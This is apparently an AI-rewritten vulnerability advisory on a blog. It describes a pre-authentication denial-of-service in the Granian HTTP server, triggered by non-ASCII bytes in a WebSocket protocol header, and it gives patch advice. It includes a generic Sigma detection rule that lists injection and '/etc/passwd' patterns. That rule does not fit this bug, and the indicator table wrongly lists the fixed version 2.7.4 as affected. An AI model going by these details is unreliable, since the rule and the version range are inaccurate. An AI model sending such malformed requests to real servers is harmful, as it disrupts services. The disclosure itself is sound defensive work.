Granian HTTP Server Vulnerability: Unauthenticated DoS via WebSocket Protocol Header
The National Vulnerability Database has disclosed CVE-2026-42544, a high-severity vulnerability (CVSS: 7.5) affecting Granian, a Rust-based HTTP server for Python applications. Versions 1.2.0 through 2.7.3 are susceptible to a denial-of-service (DoS) attack. An unauthenticated client can trigger a worker process crash by sending a WebSocket upgrade request containing non-ASCII bytes in the Sec-WebSocket-Protocol header.
This isn’t just a theoretical bug; it’s a pre-authentication DoS that hits before the ASGI application even gets a look-in. The crash occurs in Granian’s WebSocket scope construction path, meaning a malicious actor can take your server offline with a simple, malformed header. This is a critical flaw for any organization running Granian, as it allows for easy disruption of services without requiring any prior authentication or complex exploit chain. It’s a direct hit on availability.
The vulnerability is addressed in Granian version 2.7.4. Defenders running affected versions need to prioritize this patch. The attacker’s calculus here is low effort, high reward: a single unauthenticated request can cause significant operational impact, making it an attractive target for even unsophisticated actors.
What This Means For You
- If your organization utilizes Granian as an HTTP server for Python applications, immediately verify your version. If it's between 1.2.0 and 2.7.3, you are exposed to an unauthenticated denial-of-service. Patch to version 2.7.4 or later without delay to prevent service disruption from a simple, malformed WebSocket request.
Related ATT&CK Techniques
🛡️ Detection Rules
4 rules · 6 SIEM formats4 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.
Web Application Exploitation Attempt — CVE-2026-42544
title: Web Application Exploitation Attempt — CVE-2026-42544
id: scw-2026-05-12-1
status: experimental
level: high
description: |
Detects common exploitation patterns targeting web applications. Review CVE-2026-42544 advisories for specific indicators.
author: SCW Feed Engine (auto-generated)
date: 2026-05-12
references:
- https://shimiscyberworld.com/posts/nvd-CVE-2026-42544/
tags:
- attack.initial_access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- '..'
- 'SELECT'
- 'UNION'
- '<script'
- 'cmd='
- '/etc/passwd'
condition: selection
falsepositives:
- Legitimate activity from CVE-2026-42544
Source: Shimi's Cyber World · License & reuse
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2026-42544 | DoS | Granian HTTP server versions 1.2.0 to 2.7.4 |
| CVE-2026-42544 | DoS | Unauthenticated WebSocket upgrade request with non-ASCII bytes in Sec-WebSocket-Protocol header |
| CVE-2026-42544 | DoS | Granian's WebSocket scope construction path |
Written by SCW Vulnerability Desk
Source & Attribution
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | May 13, 2026 at 01:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.
Believe this infringes your rights? Submit a takedown request.
Related coverage
Fuji Tellus Driver Grants All Users Kernel R/W: CVE-2026-8108
CVE-2026-8108 — The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions.
MonsterInsights WordPress Plugin Exposes Google OAuth Tokens
CVE-2026-5371 — The MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) plugin for WordPress is vulnerable to unauthorized access and modification of...
ChurchCRM CVE-2026-44548: High-Severity CSRF Allows Silent Record Deletion
CVE-2026-44548 — ChurchCRM is an open-source church management system. Prior to 7.3.2, top-level cross-site GET navigation from an attacker-controlled page to FundRaiserDelete.php, PropertyTypeDelete.php, or NoteDelete.php...